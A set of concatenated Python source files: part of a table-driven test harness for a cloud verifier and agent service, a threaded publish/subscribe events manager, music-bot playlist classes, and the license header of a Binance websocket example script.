        # Both keys must be present with non-null values.
        if decoded.get("pubkey") == None or decoded.get("quote") == None:
            self.fail("Expected both pubkey and quote arguments." )
def check_validate_test_cloudverifier_tenant_provide_v(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Compare the recorded verifier response against canned expected values."""
    record = self.test_table.get(test_method_name)
    for entry in record[state_change_or_validation]:
        if entry.get("function_name") != test_function_name:
            continue
        decoded = json.loads(entry.get("http_result_body_actual"))
        # Canned values for test instance 06480EC4-...; checked in order v, ip, port, tpm_policy.
        expected = {
            "v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=",
            "ip": "127.0.0.1",
            "port": "8882",
            "tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"},
        }
        for field, want in expected.items():
            got = decoded.get(field)
            if got is None or got != want:
                self.fail("Returned " + field + " from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
def check_and_delete_all_entries(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Check that the verifier reports *argument* active agents, then delete each one."""
    record = self.test_table.get(test_method_name)
    for entry in record[state_change_or_validation]:
        if entry.get("function_name") != test_function_name:
            continue
        agent_id_list = json.loads(entry.get("http_result_body_actual"))
        expected_len = argument
        actual_len = len(agent_id_list)
        if actual_len != expected_len:
            self.fail("Expected " + str(expected_len) +" instance id's but received " + str(actual_len))
        # Tear down every reported agent via the verifier's DELETE endpoint.
        for agent_id in agent_id_list:
            try:
                response = tornado_requests.request(
                    "DELETE",
                    "http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
                    params={'agent_id': agent_id})
                if response.status_code != 200:
                    self.fail("Delete of agent_id " + agent_id + " failed.")
            except Exception as e:
                self.fail("Delete of agent_id " + agent_id + " failed with exception: %s"%e)
def execute_the_test(self, setup_or_state_change_or_validation, test_functions, test_iteration ):
    """Run one table-driven test function end to end.

    Sequence: optional pre_function hook, the HTTP request described by the
    table entry, response validation (status, headers, shallow body, then a
    deep check_function), and an optional post_function hook.  Actual results
    are written back into *test_functions* under http_result_*_actual keys so
    later validation phases can inspect them.
    """
    # call the pre_function
    pre_function = test_functions.get("pre_function")
    if pre_function is not None:
        pre_function_name = pre_function.get('name')
        pre_function_args = pre_function.get('args')
        function_return = getattr(self, pre_function_name)(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, pre_function_args)
        if function_return is False:
            self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ":" + pre_function_name + " pre_function failure, test aborted." )
    full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get("http_request_port") + test_functions.get("http_request_path")
    http_request_body_tag = test_functions.get("http_request_body")
    http_request_body_file_tag = test_functions.get("http_request_body_file")
    if http_request_body_tag is not None and http_request_body_file_tag is not None:
        self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
    if http_request_body_tag is None and http_request_body_file_tag is not None:
        # Original leaked this file handle; close it deterministically.
        with open(http_request_body_file_tag) as body_file:
            thedata = body_file.read()
    else:
        thedata = http_request_body_tag
    verb = test_functions.get("http_request_verb")
    query = test_functions.get("http_request_query","")
    req_header = test_functions.get("http_request_header")
    response = tornado_requests.request(verb, full_url,
                                        params=query,
                                        data=thedata,
                                        headers=req_header)
    # Spool the streamed response body to a temp file; the context manager
    # guarantees it is closed even when a validation below fails the test
    # (self.fail raises, so the original temp.close() was often skipped).
    with tempfile.TemporaryFile() as temp:
        for chunk in response.iter_content(1024):
            temp.write(chunk)
        temp.seek(0)
        # copy the results for future checking
        test_functions["http_result_status_actual"] = response.status_code
        test_functions["http_result_header_actual"] = response.headers
        test_functions["http_result_body_actual"] = temp.read()
    # validate response status
    if test_functions["http_result_status_actual"] != test_functions["http_result_status_expected"]:
        self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " expected " + str(test_functions["http_result_status_expected"]) + " but received " + str(test_functions["http_result_status_actual"]))
    # validate response headers: every expected header pair must be present
    if test_functions.get("http_result_header_expected") is not None and not all(
            item in list(response.headers.items())
            for item in list(test_functions["http_result_header_expected"].items())):
        self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive expected headers.")
    # validate (shallow) response body: exact JSON equality
    if test_functions.get("http_result_body_expected") is not None and json.loads(test_functions.get("http_result_body_expected")) != json.loads(test_functions.get("http_result_body_actual")):
        self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive exact expected result body.")
    # validate (deep) response body via a named check function
    check_function = test_functions.get("check_function")
    if check_function is not None:
        check_argument = check_function.get("argument")
        # NOTE(review): the check functions in this file fail the test
        # internally and return None, so this truthiness branch only fires
        # for a checker that returns True on mismatch.
        if getattr(self, check_function["name"])(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, check_argument):
            self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive exact expected result body.")
    # call the post_function
    post_function = test_functions.get("post_function")
    if post_function is not None:
        post_function_name = post_function.get('name')
        post_function_args = post_function.get('args')
        function_return = getattr(self, post_function_name)(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, post_function_args)
        if function_return is False:
            self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ":" + post_function_name + " post_function failure, test aborted." )
def request_task(self, queue, setup_or_state_change_or_validation, test_functions, test_iteration):
    """Thread task for concurrent test execution.

    Table data does not provide the ability to inject unique agent_id's for
    each concurrent instance, so a unique id (put there by new_thread) is
    drawn from *queue* and spliced into a copy of the request body.
    Always calls queue.task_done(), success or failure.
    """
    try:
        http_request_body_tag = test_functions.get("http_request_body")
        http_request_body_file_tag = test_functions.get("http_request_body_file")
        if http_request_body_tag != None and http_request_body_file_tag != None :
            self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
        thedata = ''
        if http_request_body_tag == None and http_request_body_file_tag != None:
            thedata = open(http_request_body_file_tag).read()
        else:
            thedata=http_request_body_tag
        # Get the agent_id from the Queue and rewrite the body with it.
        the_uid = queue.get()
        jsondata = json.loads(thedata)
        jsondata['agent_id'] = the_uid
        newdata = json.dumps(jsondata)
        # NOTE(review): `newdata` is never passed on — execute_the_test
        # re-reads the body from test_functions, so the unique agent_id
        # appears to be discarded.  Looks like a bug; confirm intent.
        # call the inline task passing the new data with the unique agent_id
        self.execute_the_test(setup_or_state_change_or_validation, test_functions, test_iteration )
    except Exception as e:
        self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", unexpected exception error: %s"%e )
    finally:
        queue.task_done()
def modify_persistence_file(self, argument):
    """Seed (or remove) the cloud-verifier persistence file before a test run.

    *argument* may be a dict (serialized to JSON), a string (written
    verbatim), a readable file-like object (its contents are copied and the
    object closed), or None (any existing persistence file is removed).
    Any stale .bak backup file is always removed.
    """
    string_to_write = None
    if isinstance(argument, dict):
        string_to_write = json.dumps(argument)
    elif isinstance(argument, str):
        string_to_write = argument
    elif hasattr(argument, "read"):
        # BUG FIX: the original tested isinstance(argument, file); the `file`
        # builtin does not exist in Python 3, so that branch raised NameError.
        # Duck-type on a .read attribute instead.
        string_to_write = argument.read()
        argument.close()
    elif argument is None:
        if os.path.isfile(cv_persistence_filename):
            os.remove(cv_persistence_filename)
    if string_to_write is not None:
        with open(cv_persistence_filename, "w") as persistence_file:
            persistence_file.write(string_to_write)
    # A leftover backup from a previous run would confuse the later checks.
    backup_file_name = cv_persistence_filename + ".bak"
    if os.path.isfile(backup_file_name):
        os.remove(backup_file_name)
def launch_cloudverifier(self, argument):
    """Start cloud_verifier.py as a subprocess, optionally seeding its persistence file."""
    readKUV()
    # Seed the persistence file first when the test supplies contents.
    if argument is not None:
        self.modify_persistence_file(argument)
    global cv_process
    cv_process = subprocess.Popen("python cloud_verifier.py", shell=True)
    # Give the server a moment to come up before the test fires requests.
    time.sleep(1)
    return True
def overwrite_config_file(self, path, section, option, value):
    """Set *option* = *value* in *section* of the config file at *path*, rewriting it in place."""
    parser = configparser.RawConfigParser()
    parser.read(path)
    parser.set(section, option, value)
    # BUG FIX: configparser.write() requires a text-mode handle in Python 3;
    # the original opened with 'wb', which raises TypeError on write.
    with open(path, 'w') as configfile:
        parser.write(configfile)
def launch_cloudagents(self, argument):
    """Spawn several cloud_agent.py instances, one per port.

    *argument* supplies 'num_cloudagent_instances' plus either
    'starting_port' (consecutive ports) or 'port_file' (one port per line).
    Each instance gets its own copy of the working tree and a config file
    rewritten with its port and a uuid contrived from the port digits.
    Spawned pids are recorded in the module-level cn_process_list.
    """
    #self.launch_cloudverifier(None)
    port_file = argument.get('port_file')
    cloudagent_start_port = argument.get('starting_port')
    num_cloudagent_instances = argument['num_cloudagent_instances']
    if cloudagent_start_port is not None:
        parser = configparser.RawConfigParser()
        parser.read(common.CONFIG_FILE)
        original_cloudagent_port = parser.get('general', 'cloudagent_port')
        test_agent_uuid = parser.get('general', 'agent_uuid')
        for cn in range(num_cloudagent_instances):
            new_dir = r'../cloudagent_on_port_' + str(cloudagent_start_port)
            config_file_path = new_dir + "/keylime.conf"
            copy_tree('.', new_dir)
            shutil.copyfile(common.CONFIG_FILE, config_file_path)
            # NOTE(review): copy_tree above already created new_dir, so this
            # mkdir guard appears to be dead code.
            if not os.path.isdir(new_dir):
                os.mkdir(new_dir)
            #shutil.copyfile(r'../keylime.conf', new_dir + r'/keylime.conf')
            self.overwrite_config_file(config_file_path, 'general', 'cloudagent_port', str(cloudagent_start_port))
            # Contrive a unique uuid by replacing the uuid's tail with the port digits.
            port_string_length = len(str(cloudagent_start_port))
            contrived_uuid = test_agent_uuid[:-port_string_length]
            contrived_uuid = contrived_uuid + str(cloudagent_start_port)
            self.overwrite_config_file(config_file_path, 'general', 'agent_uuid', contrived_uuid)
            cn_process_list.append(subprocess.Popen("python cloud_agent.py", shell=True, cwd=new_dir, preexec_fn=os.setsid).pid)
            cloudagent_start_port = cloudagent_start_port + 1
        #time.sleep(2)
        # Restore the original port so the shared config is left untouched.
        self.overwrite_config_file(common.CONFIG_FILE, 'general', 'cloudagent_port', str(original_cloudagent_port))
    elif port_file is not None:
        parser = configparser.RawConfigParser()
        parser.read(common.CONFIG_FILE)
        original_cloudagent_port = parser.get('general', 'cloudagent_port')
        test_agent_uuid = parser.get('general', 'agent_uuid')
        for cn in range(num_cloudagent_instances):
            cloudagent_port_read_from_file = self.read_line_in_file(port_file, cn).strip()
            new_dir = r'../cloudagent_on_port_' + cloudagent_port_read_from_file
            config_file_path = new_dir + "/keylime.conf"
            copy_tree('.', new_dir)
            shutil.copyfile(common.CONFIG_FILE, config_file_path)
            if not os.path.isdir(new_dir):
                os.mkdir(new_dir)
            #shutil.copyfile(r'../keylime.conf', new_dir + r'/keylime.conf')
            self.overwrite_config_file(config_file_path, 'general', 'cloudagent_port', cloudagent_port_read_from_file)
            port_string_length = len(cloudagent_port_read_from_file)
            contrived_uuid = test_agent_uuid[:-port_string_length]
            contrived_uuid = contrived_uuid + cloudagent_port_read_from_file
            self.overwrite_config_file(config_file_path, 'general', 'agent_uuid', contrived_uuid)
            cn_process_list.append(subprocess.Popen("python cloud_agent.py", shell=True, cwd=new_dir, preexec_fn=os.setsid).pid)
            # NOTE(review): dead assignment — the port is re-read from the
            # file each iteration and `cloudagent_port` is never used.
            cloudagent_port = int(cloudagent_port_read_from_file) + 1
        #time.sleep(2)
        self.overwrite_config_file(common.CONFIG_FILE, 'general', 'cloudagent_port', str(original_cloudagent_port))
    print("done creating cloud agents, waiting for them to start...")
    time.sleep(10)
    print("starting test...")
def kill_cloudagents_after_delay(self, argument):
    """After argument['sleep'] seconds, tear down the agents made by launch_cloudagents.

    Removes each per-port working directory; in port_file mode it also sends
    the verifier a DELETE for every contrived agent uuid first.  Finally
    SIGTERMs every recorded agent process group.
    """
    time.sleep(argument.get('sleep'))
    port_file = argument.get('port_file')
    cloudagent_start_port = argument.get('starting_port')
    num_cloudagent_instances = argument['num_cloudagent_instances']
    if cloudagent_start_port is not None:
        for cn in range(num_cloudagent_instances):
            new_dir = r'../cloudagent_on_port_' + str(cloudagent_start_port)
            shutil.rmtree(new_dir)
            # BUG FIX: the original assigned `cloudagent_port` (a different,
            # unused name), so every iteration removed the same directory.
            cloudagent_start_port = cloudagent_start_port + 1
    elif port_file is not None:
        parser = configparser.RawConfigParser()
        parser.read(common.CONFIG_FILE)
        test_agent_uuid = parser.get('general', 'agent_uuid')
        for cn in range(num_cloudagent_instances):
            cloudagent_port_read_from_file = self.read_line_in_file(port_file, cn).strip()
            # Reconstruct the per-instance uuid exactly as launch_cloudagents did.
            port_string_length = len(cloudagent_port_read_from_file)
            contrived_uuid = test_agent_uuid[:-port_string_length] + cloudagent_port_read_from_file
            params = {
                'agent_id': contrived_uuid,
            }
            try:
                print(("Sending #" + str(cn) + " DELETE request to CV for uuid: " + contrived_uuid))
                response = tornado_requests.request("DELETE",
                        "http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
                        params=params)
                if response.status_code != 200:
                    self.fail("Delete of agent_id " + contrived_uuid + " failed.")
            except Exception as e:
                self.fail("Delete of agent_id " + contrived_uuid + " failed with exception: %s"%e)
        for cn in range(num_cloudagent_instances):
            cloudagent_port_read_from_file = self.read_line_in_file(port_file, cn).strip()
            shutil.rmtree(r'../cloudagent_on_port_' + cloudagent_port_read_from_file)
    # Kill the whole process group of every spawned agent.
    for the_pid in cn_process_list:
        print(("killing pid" + str(the_pid)))
        os.killpg(the_pid, signal.SIGTERM)
def kill_cloudverifier(self, argument):
    """Terminate the cloud verifier subprocess started by launch_cloudverifier."""
    cv_process.kill()
    return True
def launch_cloudagent(self, argument):
    """Start a single cloud_agent.py subprocess and give it a second to come up."""
    readKUV()
    global cn_process
    cn_process = subprocess.Popen("python cloud_agent.py", shell=True)
    time.sleep(1)
    return True
def kill_cloudagent(self, argument):
    """Terminate the cloud agent subprocess started by launch_cloudagent."""
    cn_process.kill()
    return True
def launch_required_servers(self, argument):
    """Bring up both the cloud agent and the cloud verifier."""
    for launcher in (self.launch_cloudagent, self.launch_cloudverifier):
        launcher(argument)
    return True
def kill_required_servers(self, argument):
    """Shut down both the cloud agent and the cloud verifier."""
    for killer in (self.kill_cloudagent, self.kill_cloudverifier):
        killer(argument)
    return True
def new_thread(self, args):
    """Create (but do not start) a worker thread for request_task.

    A fresh agent uuid is pushed onto the shared queue (args[0]) so each
    concurrent request can claim a unique identity.
    """
    shared_queue = args[0]
    shared_queue.put(str(uuid.uuid4()))
    return threading.Thread(target=self.request_task, args=args)
def execute_test_function_set(self, setup_or_state_change_or_validation):
    """Execute every test function of the given phase for the current test.

    Functions run either inline or, when a "concurrency" stanza is present,
    fanned out over worker threads created by the configured
    new_thread_function.  Worker tasks synchronize through the module-level
    `queue` object and must call task_done() regardless of outcome.
    (Cleanup: 15 lines of commented-out dead code were removed here.)
    """
    # look up the test record
    test_record = self.test_table.get(self._testMethodName)
    change_or_validation = test_record.get(setup_or_state_change_or_validation)
    if change_or_validation is None:
        return
    for test_functions in test_record[setup_or_state_change_or_validation]:
        concurrent_instances = None
        concurrent_new_thread_function = None
        concurrency_dict = test_functions.get("concurrency")
        if concurrency_dict is not None:
            concurrent_instances = concurrency_dict.get("instances")
            concurrent_new_thread_function = concurrency_dict.get("new_thread_function")
            if concurrent_instances is None or concurrent_new_thread_function is None:
                self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ' contains concurrency agent without mandatory \\"instances\\" or and \\"new_thread_function\\" specifiers' )
        for test_iteration in range(int(test_functions.get("test_iterations","1"))):
            if concurrent_instances is None:
                # do it inline on this thread
                self.execute_the_test(setup_or_state_change_or_validation, test_functions, test_iteration)
            else:
                threads = []
                for count in range(concurrent_instances):
                    args = (queue, setup_or_state_change_or_validation, test_functions, test_iteration)
                    # The new_thread_function sets up the task and returns an
                    # unstarted Thread; its task must not block and must call
                    # task_done() on completion, success or failure.
                    new_thread = getattr(self, concurrent_new_thread_function)(args)
                    threads.append(new_thread)
                # start the threads
                for t in threads:
                    t.start()
                # blocks until all tasks have called task_done()
                queue.join()
                # blocks until all threads are complete
                for t in threads:
                    t.join()
def execute_test_definition(self):
    """Run the full table entry for this test: optional prerun hook, the three
    standard phases, then an optional postrun hook."""
    test_record = self.test_table.get(self._testMethodName)

    def run_hook(key):
        # Hooks are looked up by name on self and given their table args.
        hook = test_record.get(key)
        if hook is not None:
            getattr(self, hook.get("name"))(hook.get("args"))

    run_hook("prerun_function")
    for phase in ("setup_functions", "state_change_functions", "state_validation_functions"):
        self.execute_test_function_set(phase)
    run_hook("postrun_function")
def setUp(self):
    # No per-test setup: server lifecycle is driven by prerun/postrun hooks
    # declared in the test table instead.
    pass
def tearDown(self):
    # No per-test teardown: cleanup happens via postrun hooks in the table.
    #os.killpg(self.cloudverifier_process.pid, signal.SIGKILL)
    pass
# Run the whole table-driven suite when executed directly.
if __name__ == "__main__":
    #import sys;sys.argv = ['', 'Test.testName']
    unittest.main()
|
eventsmanager.py | import threading
from time import sleep
def singleton(cls):
    """Class decorator: every call returns the same lazily created instance.

    Constructor arguments are honored only on the first call.
    """
    box = [None]  # one-slot closure cell holding the sole instance

    def get_instance(*args, **kwargs):
        if box[0] is None:
            box[0] = cls(*args, **kwargs)
        return box[0]
    return get_instance
def sameFunction(f1, f2):
    """True when f1 and f2 wrap the same underlying function.

    Bound methods are unwrapped via __func__ so two bindings of the same
    method compare equal.  Used by unsubscribe to match handlers.
    """
    unwrapped1 = getattr(f1, '__func__', f1)
    unwrapped2 = getattr(f2, '__func__', f2)
    return unwrapped1 is unwrapped2
@singleton
class EventsManager():
    """Thread-backed publish/subscribe hub.

    Decorated with @singleton, so the whole process shares one instance.
    publish() only enqueues; a background thread delivers messages to the
    handlers subscribed to the message's topic.
    """
    def __init__(self):
        self.subscriptions = {}  # topic -> list of handler callables
        self.eventsQueue = []    # pending messages, oldest first
        self.run()

    def subscribe(self, topic, handler):
        """Register *handler* to receive messages published on *topic*."""
        self.subscriptions.setdefault(topic, []).append(handler)
        print("EventsManager: New subscription to %s" % topic)

    def unsubscribe(self, handler):
        """Remove every subscription whose handler matches *handler*
        (same underlying function bound to the same instance)."""
        for topic in self.subscriptions:
            keep = []
            for h in self.subscriptions[topic]:
                if sameFunction(h, handler) and h.__self__ == handler.__self__:
                    print("EventsManager: Removing subscription to", topic)
                else:
                    keep.append(h)
            self.subscriptions[topic] = keep

    def publish(self, topic, message):
        """Tag *message* with its topic and enqueue it for async delivery."""
        message["topic"] = topic
        self.eventsQueue.append(message)

    def handleEvents(self):
        """Worker loop: pop queued messages and invoke their topic handlers."""
        while True:
            try:
                message = self.eventsQueue.pop(0)
            except IndexError:
                # BUG FIX: the original bare except spun at 100% CPU on an
                # empty queue; back off briefly instead.
                sleep(0.01)
                continue
            for handler in self.subscriptions.get(message["topic"], []):
                try:
                    handler(message)
                except Exception:
                    # BUG FIX: one failing handler no longer aborts delivery
                    # to the remaining handlers (and never kills the thread).
                    pass

    def run(self):
        # BUG FIX: daemon thread, so a lingering dispatcher cannot block
        # interpreter exit (the original non-daemon thread hung forever).
        t = threading.Thread(target=self.handleEvents, daemon=True)
        t.start()
playlist.py | import json
import threading
import logging
import random
import time
import variables as var
from media.cache import (CachedItemWrapper, ItemNotCachedError,
get_cached_wrapper_from_dict, get_cached_wrapper_by_id)
from database import Condition
from media.item import ValidationFailedError, PreparationFailedError
def get_playlist(mode, _list=None, _index=None):
    """Build a playlist object for *mode*, optionally seeded from *_list*.

    Modes map to classes: "one-shot", "repeat", "random", "autoplay".
    Raises ValueError for an unknown mode (BUG FIX: the original fell
    through to a bare `raise`, which produced a confusing RuntimeError).
    """
    classes = {
        "one-shot": OneshotPlaylist,
        "repeat": RepeatPlaylist,
        "random": RandomPlaylist,
        "autoplay": AutoPlaylist,
    }
    cls = classes.get(mode)
    if cls is None:
        raise ValueError("Unknown playlist mode: %s" % mode)
    if _list is None:
        return cls()
    # NOTE(review): as in the original, a supplied _index leaves index at -1
    # (_index is only tested for None, never used as the cursor).
    index = -1
    if _list and _index is None:
        index = _list.current_index
    return cls().from_list(_list, index)
class BasePlaylist(list):
    """A playlist: a list of CachedItemWrapper plus a play cursor.

    `version` is bumped on every mutation so observers can detect changes.
    Newly added items are queued in `pending_items` and validated by a
    background thread (async_validate).  Mutations are guarded by
    `playlist_lock`.
    """

    def __init__(self):
        super().__init__()
        self.current_index = -1
        self.version = 0  # increase by one after each change
        self.mode = "base"  # "repeat", "random"
        self.pending_items = []
        self.log = logging.getLogger("bot")
        self.validating_thread_lock = threading.Lock()
        self.playlist_lock = threading.RLock()

    def is_empty(self):
        """True when the playlist holds no items."""
        return len(self) == 0

    def from_list(self, _list, current_index):
        """Replace the contents with *_list* and point the cursor at *current_index*."""
        self.version += 1
        super().clear()
        # Goes through self.extend so the new items get queued for validation.
        self.extend(_list)
        self.current_index = current_index
        return self

    def append(self, item: CachedItemWrapper):
        """Append *item* and queue it for background validation."""
        with self.playlist_lock:
            self.version += 1
            super().append(item)
            self.pending_items.append(item)
            self.async_validate()
            return item

    def insert(self, index, item):
        """Insert *item* at *index* (-1 means at the cursor), keeping the cursor stable."""
        with self.playlist_lock:
            self.version += 1
            if index == -1:
                index = self.current_index
            super().insert(index, item)
            if index <= self.current_index:
                self.current_index += 1
            self.pending_items.append(item)
            self.async_validate()
            return item

    def extend(self, items):
        """Append all *items* and queue them for background validation."""
        with self.playlist_lock:
            self.version += 1
            super().extend(items)
            self.pending_items.extend(items)
            self.async_validate()
            return items

    def next(self):
        """Advance and return the next item, or False at the end / when empty."""
        with self.playlist_lock:
            if len(self) == 0:
                return False
            if self.current_index < len(self) - 1:
                self.current_index += 1
                return self[self.current_index]
            return False

    def point_to(self, index):
        """Move the cursor to *index* if it is in range (-1 allowed)."""
        with self.playlist_lock:
            if -1 <= index < len(self):
                self.current_index = index

    def find(self, id):
        """Return the index of the wrapper whose *item* has this id, else None."""
        with self.playlist_lock:
            for index, wrapper in enumerate(self):
                if wrapper.item.id == id:
                    return index
            return None

    def __delitem__(self, key):
        # del pl[i] goes through remove() so cache refcounting stays correct.
        return self.remove(key)

    def remove(self, index):
        """Remove the entry at *index*; free its cache slot when unreferenced."""
        with self.playlist_lock:
            self.version += 1
            if index > len(self) - 1:
                return False
            removed = self[index]
            super().__delitem__(index)
            if self.current_index > index:
                self.current_index -= 1
            # reference counter: free the cached media only when no other
            # playlist entry still points at the same id.
            counter = 0
            for wrapper in self:
                if wrapper.id == removed.id:
                    counter += 1
            if counter == 0:
                var.cache.free(removed.id)
            return removed

    def remove_by_id(self, id):
        """Remove every entry whose wrapper id equals *id*."""
        to_be_removed = []
        for index, wrapper in enumerate(self):
            if wrapper.id == id:
                to_be_removed.append(index)
        if to_be_removed:
            self.version += 1
            # BUG FIX: remove from the back — the original iterated in
            # ascending order, so each removal shifted the remaining indexes
            # and the wrong items were removed when id occurred twice.
            for index in reversed(to_be_removed):
                self.remove(index)

    def current_item(self):
        """Return the item under the cursor, or False when empty."""
        with self.playlist_lock:
            if len(self) == 0:
                return False
            return self[self.current_index]

    def next_index(self):
        """Index of the upcoming item, or False at the end."""
        with self.playlist_lock:
            if self.current_index < len(self) - 1:
                return self.current_index + 1
            return False

    def next_item(self):
        """The upcoming item, or False at the end."""
        with self.playlist_lock:
            if self.current_index < len(self) - 1:
                return self[self.current_index + 1]
            return False

    def randomize(self):
        """Shuffle in place; the cursor restarts since its position is meaningless."""
        with self.playlist_lock:
            random.shuffle(self)
            self.current_index = -1
            self.version += 1

    def clear(self):
        """Empty the playlist and free every cached item."""
        with self.playlist_lock:
            self.version += 1
            self.current_index = -1
            super().clear()
            var.cache.free_all()

    def save(self):
        """Persist cursor and items to the database."""
        with self.playlist_lock:
            var.db.remove_section("playlist_item")
            assert self.current_index is not None
            var.db.set("playlist", "current_index", self.current_index)
            for index, music in enumerate(self):
                var.db.set("playlist_item", str(index), json.dumps({'id': music.id, 'user': music.user}))

    def load(self):
        """Restore cursor and items from the database (no-op when nothing saved)."""
        current_index = var.db.getint("playlist", "current_index", fallback=-1)
        if current_index == -1:
            return
        items = var.db.items("playlist_item")
        if items:
            music_wrappers = []
            # Keys are stringified indexes; sort numerically to restore order.
            items.sort(key=lambda v: int(v[0]))
            for item in items:
                item = json.loads(item[1])
                music_wrapper = get_cached_wrapper_by_id(item['id'], item['user'])
                if music_wrapper:
                    music_wrappers.append(music_wrapper)
            self.from_list(music_wrappers, current_index)

    def _debug_print(self):
        """Dump the playlist to stdout, marking the cursor position."""
        print("===== Playlist(%d) =====" % self.current_index)
        for index, item_wrapper in enumerate(self):
            if index == self.current_index:
                print("-> %d %s" % (index, item_wrapper.format_debug_string()))
            else:
                print("%d %s" % (index, item_wrapper.format_debug_string()))
        print("===== End =====")

    def async_validate(self):
        """Start background validation of pending items (at most one worker)."""
        if not self.validating_thread_lock.locked():
            time.sleep(0.1)  # avoid validation finishing so fast items get freed mid-read
            th = threading.Thread(target=self._check_valid, name="Validating")
            th.daemon = True
            th.start()

    def _check_valid(self):
        """Worker: validate pending items, evicting any that fail."""
        self.log.debug("playlist: start validating...")
        self.validating_thread_lock.acquire()
        while len(self.pending_items) > 0:
            item = self.pending_items.pop()
            try:
                item.item()
            except ItemNotCachedError:
                # Items can be removed and freed from playlist and cache
                # before validation even starts; ignore such stale entries.
                continue
            self.log.debug("playlist: validating %s" % item.format_debug_string())
            ver = item.version
            try:
                item.validate()
            except ValidationFailedError as e:
                self.log.debug("playlist: validating failed.")
                if var.bot:
                    var.bot.send_channel_msg(e.msg)
                self.remove_by_id(item.id)
                var.cache.free_and_delete(item.id)
                continue
            if item.version > ver:
                self.version += 1
        self.log.debug("playlist: validating finished.")
        self.validating_thread_lock.release()
class OneshotPlaylist(BasePlaylist):
    """Playlist that consumes items: next() deletes the finished item, so the
    list shrinks as playback proceeds and the playing item sits at index 0."""
    def __init__(self):
        super().__init__()
        self.mode = "one-shot"
        self.current_index = -1

    def current_item(self):
        # The item under the cursor, or False when empty; an unset cursor
        # snaps to the head.
        with self.playlist_lock:
            if len(self) == 0:
                self.current_index = -1
                return False
            if self.current_index == -1:
                self.current_index = 0
            return self[self.current_index]

    def from_list(self, _list, current_index):
        # Items before current_index have already played in one-shot terms:
        # drop them and restart from the head of what remains.
        with self.playlist_lock:
            if len(_list) > 0:
                if current_index > -1:
                    for i in range(current_index):
                        _list.pop(0)
                    return super().from_list(_list, 0)
                return super().from_list(_list, -1)
            return self

    def next(self):
        # Delete the finished item and return the new head, or False when drained.
        with self.playlist_lock:
            if len(self) > 0:
                self.version += 1
                if self.current_index != -1:
                    super().__delitem__(self.current_index)
                    if len(self) == 0:
                        return False
                else:
                    self.current_index = 0
                return self[0]
            else:
                self.current_index = -1
                return False

    def next_index(self):
        # The upcoming item is always at index 1 (index 0 is playing).
        if len(self) > 1:
            return 1
        else:
            return False

    def next_item(self):
        if len(self) > 1:
            return self[1]
        else:
            return False

    def point_to(self, index):
        # Jumping forward consumes everything before the target item.
        with self.playlist_lock:
            self.version += 1
            self.current_index = -1
            for i in range(index):
                super().__delitem__(0)
class RepeatPlaylist(BasePlaylist):
    """Playlist that loops: after the last item it wraps back to the first."""

    def __init__(self):
        super().__init__()
        self.mode = "repeat"

    def next(self):
        """Advance the cursor, wrapping to index 0; False when empty."""
        with self.playlist_lock:
            if not self:
                return False
            if self.current_index >= len(self) - 1:
                self.current_index = 0
            else:
                self.current_index += 1
            return self[self.current_index]

    def next_index(self):
        """Index that next() would move to (wraps to 0 at the end)."""
        with self.playlist_lock:
            if self.current_index >= len(self) - 1:
                return 0
            return self.current_index + 1

    def next_item(self):
        """Item that next() would return, or False when empty."""
        if not self:
            return False
        return self[self.next_index()]
class RandomPlaylist(BasePlaylist):
    """Playlist played in shuffled order; reshuffles once it reaches the end."""

    def __init__(self):
        super().__init__()
        self.mode = "random"

    def from_list(self, _list, current_index):
        # Incoming order is irrelevant in random mode: shuffle and restart.
        self.version += 1
        random.shuffle(_list)
        return super().from_list(_list, -1)

    def next(self):
        """Advance the cursor; at the end, reshuffle and restart from index 0."""
        with self.playlist_lock:
            if not self:
                return False
            if self.current_index >= len(self) - 1:
                # Exhausted: reshuffle and start over.
                self.version += 1
                self.randomize()
                self.current_index = 0
            else:
                self.current_index += 1
            return self[self.current_index]
class AutoPlaylist(OneshotPlaylist):
    """One-shot playlist that refills itself from the music database."""

    def __init__(self):
        super().__init__()
        self.mode = "autoplay"

    def refresh(self):
        """Replace contents with random DB tracks not tagged "don't autoplay"."""
        wanted = var.config.getint("bot", "autoplay_length")
        rows = var.music_db.query_random_music(
            wanted,
            Condition().and_not_sub_condition(
                Condition().and_like('tags', "%don't autoplay,%")))
        if rows:
            wrappers = [get_cached_wrapper_from_dict(row, "AutoPlay") for row in rows]
            self.from_list(wrappers, -1)

    def clear(self):
        """Clearing immediately repopulates from the database."""
        super().clear()
        self.refresh()

    def next(self):
        """Refill when drained, then consume the next item as one-shot does."""
        if not self:
            self.refresh()
        return super().next()
|
example_subscribe.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_subscribe.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2020, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
